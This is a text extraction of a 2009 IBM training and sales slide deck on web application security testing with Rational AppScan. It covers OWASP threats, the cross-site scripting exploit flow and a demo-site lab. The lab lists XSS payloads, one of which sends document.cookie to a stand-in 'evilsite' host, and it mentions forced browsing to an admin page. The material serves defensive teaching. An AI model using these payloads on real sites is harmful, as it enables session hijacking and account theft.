rational appscan & ounce products - ibm - 2009.pdf · 2009-09-17 · control, policy, audits...
TRANSCRIPT
®
IBM Software Group
© 2007 IBM Corporation
Rational AppScan & Ounce Products
Presenters Tony Sisson and Frank Sassano
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
2
The Alarming TruthCheckFree • ‘warns 5 million customers after hack’
http://infosecurity.us/?p=5168January 9, 2009
Hannaford Bros. Grocery Chain •‘4 million credit & debit cards exposed’
http://www.cnn.com/2008/US/03/18/retail.data.breach.ap/index.htmlMarch 18, 2008
Montgomery Ward • ‘51,000 customer credit card numbers...’
http://www.scmagazineus.com/Report-Montgomery-Ward-fails-to-alert-victims-of-breach/article/111922/June 27, 2008
Target Stores• ‘Blind users win $6M suite; Target to make website accessible’
http://digg.com/tech_news/Blind_Users_Win_6M_Suit_Target_To_Make_Website_Accessible2008
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
2
The Alarming TruthCheckFree • ‘warns 5 million customers after hack’
http://infosecurity.us/?p=5168January 9, 2009
Hannaford Bros. Grocery Chain •‘4 million credit & debit cards exposed’
http://www.cnn.com/2008/US/03/18/retail.data.breach.ap/index.htmlMarch 18, 2008
Montgomery Ward • ‘51,000 customer credit card numbers...’
http://www.scmagazineus.com/Report-Montgomery-Ward-fails-to-alert-victims-of-breach/article/111922/June 27, 2008
Target Stores• ‘Blind users win $6M suite; Target to make website accessible’
http://digg.com/tech_news/Blind_Users_Win_6M_Suit_Target_To_Make_Website_Accessible2008
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
3
Bad Press Decreases Shareholder Value
One-day market cap drop of $200M
Wednesday, September 16, 2009
IBM Software Group | Rational software
2
Network Server
WebApplications
The Reality: Security and Focus Are Unbalanced
% of Attacks % of Dollars
75% 10%
25%
90%
Security Spending
of All Attacks on Information SecurityAre Directed to the Web Application Layer75%
of All Web Applications Are Vulnerable2/3
Security
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
5
The Myth: “Our Site Is Safe”Security
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
5
We Use Network Vulnerability Scanners
The Myth: “Our Site Is Safe”
We Have Firewalls in Place We Audit It Once a
Quarter with Pen Testers
Security
Wednesday, September 16, 2009
Database
IBM Software Group | Rational software
High Level Web Application Architecture Review
(Presentation) App Server
(Business
Logic)
Client Tier
(Browser)
Middle TierData Tier
Firewall
Internet
3
Wednesday, September 16, 2009
Database
IBM Software Group | Rational software
High Level Web Application Architecture Review
(Presentation) App Server
(Business
Logic)
Client Tier
(Browser)
Middle TierData Tier
Firewall
Customer App is deployed here
Internet
3
Wednesday, September 16, 2009
Database
IBM Software Group | Rational software
High Level Web Application Architecture Review
(Presentation) App Server
(Business
Logic)
Client Tier
(Browser)
Middle TierData Tier
Firewall
Sensitive data is stored
hereCustomer App is deployed here
Internet
3
Wednesday, September 16, 2009
Database
IBM Software Group | Rational software
High Level Web Application Architecture Review
(Presentation) App Server
(Business
Logic)
Client Tier
(Browser)
Middle TierData Tier
Firewall
Sensitive data is stored
here
Protects Network
Customer App is deployed here
Internet
3
Wednesday, September 16, 2009
Database
IBM Software Group | Rational software
High Level Web Application Architecture Review
(Presentation) App Server
(Business
Logic)
Client Tier
(Browser)
Middle TierData Tier
Firewall
Sensitive data is stored
here
SSL
Protects Transport Protects Network
Customer App is deployed here
Internet
3
Wednesday, September 16, 2009
Database
IBM Software Group | Rational software
High Level Web Application Architecture Review
(Presentation) App Server
(Business
Logic)
Client Tier
(Browser)
Middle TierData Tier
Firewall
Sensitive data is stored
here
SSL
Protects Transport Protects Network
Customer App is deployed here
Internet
3
Wednesday, September 16, 2009
IBM Software Group | Rational software
Perimeter IDS IPS
Intrusion
Detection
System
Intrusion
Prevention
System
Network Defenses for Web Applications
App Firewall
Application
Firewall
Firewall
System Incident Event Management (SIEM)
Security
HTTP
Request
designed to (fail securely) by allowing through traffic that they don't understand
4
Wednesday, September 16, 2009
IBM Software Group | Rational softwareIBM Software Group | Rational software
Security Testing Technologies Primer
Static Code Analysis = Whitebox
- Looking at the code for security issues (code-level scanning)
Dynamic Analysis = Blackbox - Sending tests to a functioning application
Total Potential
Security Issues
Dynamic
Analysis
Static
Analysis
6
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
9
Building Security & Compliance into the Software
Build
Developers
SDLC
Developers
Developers
Coding QA Security Production
Enable Security to effectively drive remediation into development
Provides Developers and Testers with expertise on detection and
remediation ability
Ensure vulnerabilities are addressed before applications are put into production
Wednesday, September 16, 2009
IBM Software Group | Rational software
Rational AppScan End-to-End Web Application SecurityREQUIREMENTS CODE BUILD SECURITY PRODUCTIONQA
AppScan Standard
(desktop)
AppScan Tester
(scan agent & clients)
Req’ts Definition
(security templates)
AppScan OnDemand
(SaaS)AppScan Enterprise / Reporting Console
(enterprise-wide scanning and reporting)
Security / compliance testing incorporated into
testing & remediation workflows
Security requirements defined before
design & implementation
Outsourced testing for
security audits & production site
monitoring
Security & Compliance
Testing, oversight,
control, policy, audits
Build security testing into the
IDE*
Application Security Best Practices
Automate Security /
Compliance testing in the Build Process
Ounce Products - Eclipse/VS IDE
Security for the development lifecycle
Security audit solutions for IT Security
Address security from the start
5
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
11
Application Threat Negative Impact Example Impact
Cross-Site® scripting Identity Theft, Sensitive Information Leakage, …
Hackers can impersonate legitimate users, and control their accounts.
Injection Flaws Attacker can manipulate queries to the DB / LDAP / Other system
Hackers can access backend database information, alter it or steal it.
Malicious File Execution Execute shell commands on server, up to full control
Site modified to transfer all interactions to the hacker.
Insecure Direct Object Reference
Attacker can access sensitive files and resources
Web application returns contents of sensitive file (instead of harmless one)
Cross-Site Request Forgery Attacker can invoke “blind” actions on Web applications, impersonating as a trusted user
Blind requests to bank account transfer money to hacker
Information Leakage and Improper Error Handling
Attackers can gain detailed system information
Malicious system reconnaissance may assist in developing further attacks
Broken Authentication & Session Management
Session tokens not guarded or invalidated properly
Hacker can “force” session token on victim; session tokens can be stolen after logout
Insecure Cryptographic Storage
Weak encryption techniques may lead to broken encryption
Confidential information (SSN, Credit Cards) can be decrypted by malicious users
Insecure Communications Sensitive info sent unencrypted over insecure channel
Unencrypted credentials “sniffed” and used by hacker to impersonate user
Failure to Restrict URL Access Hacker can access unauthorized resources
Hacker can forcefully browse and access a page past the login page
Open Web Application Security Project (OWASP) Top10
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
12
Cross-Site Scripting – The Exploit Process
Evil.org
User bank.com
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
12
Cross-Site Scripting – The Exploit Process
Evil.org
User bank.com
1) Link to bank.comsent to user viaE-mail or HTTP
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
12
Cross-Site Scripting – The Exploit Process
Evil.org
User bank.com
1) Link to bank.comsent to user viaE-mail or HTTP
2) User sends script embedded as data
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
12
Cross-Site Scripting – The Exploit Process
Evil.org
User bank.com
1) Link to bank.comsent to user viaE-mail or HTTP
2) User sends script embedded as data
3) Script/data returned, executed by browser
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
12
Cross-Site Scripting – The Exploit Process
Evil.org
User bank.com
1) Link to bank.comsent to user viaE-mail or HTTP
2) User sends script embedded as data
3) Script/data returned, executed by browser
4) Script sends user’s cookie and session information without the user’s consent or knowledge
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
12
Cross-Site Scripting – The Exploit Process
Evil.org
User bank.com
1) Link to bank.comsent to user viaE-mail or HTTP
2) User sends script embedded as data
3) Script/data returned, executed by browser
4) Script sends user’s cookie and session information without the user’s consent or knowledge
5) Evil.org uses stolen session information to impersonate user
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
13
Lab 1Profile Web Application, Steal CookiesThe Goal of this lab is to: profile the demo.testfire.net application utilize a Cross-Site Scripting vulnerability on the
demo.testfire.net application in order to access cookies on a target user’s browser
Search Super Bowl <B>Super Bowl</B> <script>alert(1)</script> <script>alert(document.cookie)</script> Tamperdata - for gathering the Cookie information to send to Grandma!
– SEARCH - <script>document.write('<img src=http://evilsite/'+document.cookie);</script>
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
14
SQL Injection Example
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
15
SQL Injection Example
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
16
SQL Injection Example - Exploit
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
17
SQL Injection Example - Outcome
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
18
Information Leakage – Different User/Pass Error
verbose login error messages
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
19
Failure to Restrict URL Access - Admin User loginPrivilege Escalation Example
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
19
Failure to Restrict URL Access - Admin User loginPrivilege Escalation Example
/admin/admin.aspx
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
20
Forcefully browse to admin page
Wednesday, September 16, 2009
IBM Software Group | Rational
IBM Confidential21
AppScan’s HTTP-Based Malware Scanning
1. Discover all content and links in a Web Application
– Execute JavaScript & Flash
– Fill forms and login sequences
– Analyze secure pages– …
Wednesday, September 16, 2009
IBM Software Group | Rational
IBM Confidential21
AppScan’s HTTP-Based Malware Scanning
1. Discover all content and links in a Web Application
– Execute JavaScript & Flash
– Fill forms and login sequences
– Analyze secure pages– …
Wednesday, September 16, 2009
IBM Software Group | Rational
IBM Confidential21
AppScan’s HTTP-Based Malware Scanning
1. Discover all content and links in a Web Application
– Execute JavaScript & Flash
– Fill forms and login sequences
– Analyze secure pages– …
2. Analyze all content for malicious behavior indicators
3. Compare all links to comprehensive black-lists
Wednesday, September 16, 2009
IBM Software Group | Rational
IBM Confidential21
link1
link2
link3
AppScan’s HTTP-Based Malware Scanning
1. Discover all content and links in a Web Application
– Execute JavaScript & Flash
– Fill forms and login sequences
– Analyze secure pages– …
2. Analyze all content for malicious behavior indicators
3. Compare all links to comprehensive black-lists
Wednesday, September 16, 2009
IBM Software Group | Rational
IBM Confidential21
link1
link2
link3
AppScan’s HTTP-Based Malware Scanning
1. Discover all content and links in a Web Application
– Execute JavaScript & Flash
– Fill forms and login sequences
– Analyze secure pages– …
2. Analyze all content for malicious behavior indicators
3. Compare all links to comprehensive black-lists
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
22
Introducing expanded Rational
AppScan OnDemand: Comprehensive testing of pre-production applications Periodic assessment of applications in QA or Security Monthly scans Flexible offerings (Small/Medium/Large)
The Result: Ability to address online risk without in-house resources with the faster route to actionable information
AppScan Tester OnDemand Production Site Monitoring: Continuous scanning of production Web sites for vulnerabilities that may
have been introduced after the app went live Dynamic or interactive content and forms, online registrations Weekly scans
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
22
Introducing expanded Rational
AppScan OnDemand: Comprehensive testing of pre-production applications Periodic assessment of applications in QA or Security Monthly scans Flexible offerings (Small/Medium/Large)
The Result: Ability to address online risk without in-house resources with the faster route to actionable information
AppScan/Policy Tester OnDemand
AppScan Tester OnDemand Production Site Monitoring: Continuous scanning of production Web sites for vulnerabilities that may
have been introduced after the app went live Dynamic or interactive content and forms, online registrations Weekly scans
Wednesday, September 16, 2009
© 2008 IBM Corporation
IBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational softwareIBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational software
The Impact of Securing Flash-based Applications
• Flash one of the fastest growing security problemsPractically in every web application
• Flash vulnerabilities: Cross-Site FlashingCross-Site Scripting through FlashPhishingFlow Manipulation
Wednesday, September 16, 2009
© 2008 IBM Corporation
IBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational softwareIBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational software
The Impact of Securing Flash-based Applications
• Flash one of the fastest growing security problemsPractically in every web application
• Flash vulnerabilities: Cross-Site FlashingCross-Site Scripting through FlashPhishingFlow Manipulation
Wednesday, September 16, 2009
© 2008 IBM Corporation
IBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational softwareIBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational software
The Impact of Securing Flash-based Applications
• Flash one of the fastest growing security problemsPractically in every web application
• Flash vulnerabilities: Cross-Site FlashingCross-Site Scripting through FlashPhishingFlow Manipulation
Flex “Next-Generation” of Flash
Wednesday, September 16, 2009
© 2008 IBM Corporation
IBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational softwareIBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational software
The Impact of Securing Flash-based Applications
• Flash one of the fastest growing security problemsPractically in every web application
• Flash vulnerabilities: Cross-Site FlashingCross-Site Scripting through FlashPhishingFlow Manipulation
Flex “Next-Generation” of Flash
“Marketing” Flash BannerCompromises the entire
web application
Wednesday, September 16, 2009
IBM Software Group | Rational software
7
Wednesday, September 16, 2009
IBM Software Group | Rational software
8
Wednesday, September 16, 2009
IBM Software Group | Rational software
9
Wednesday, September 16, 2009
IBM Software Group | Rational software
9
Wednesday, September 16, 2009
Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation
IBM Software Group
28
Wednesday, September 16, 2009